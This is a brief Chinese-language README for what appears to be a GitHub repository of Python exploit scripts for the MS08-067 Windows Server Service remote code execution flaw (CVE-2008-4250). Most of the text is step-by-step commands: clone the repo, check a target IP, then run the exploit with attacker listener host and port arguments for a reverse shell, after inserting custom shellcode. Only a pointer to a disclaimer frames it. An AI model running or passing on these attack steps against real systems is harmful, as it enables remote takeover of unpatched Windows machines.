此仓库包含 MS08-067 Windows Server Service 漏洞(CVE-2008-4250)的一些 Python 脚本实现。这是一个影响旧版 Windows 系统的经典远程代码执行漏洞。
首先,打开 Shell 或 Cmd。然后 👉 运行以下命令:
git clone https://github.com/BinRacer/ms08-067.py.git
cd ms08-067.py
pip install -r requirements.txt
python src/ms08_067_check.py <target_ip>
# before use ms08_067_exploit.py, must replace shellcode in python file
python src/ms08_067_exploit.py <target_ip> <lhost> <lport>
有关完整的法律信息和免责声明,请参阅 免责声明 文档。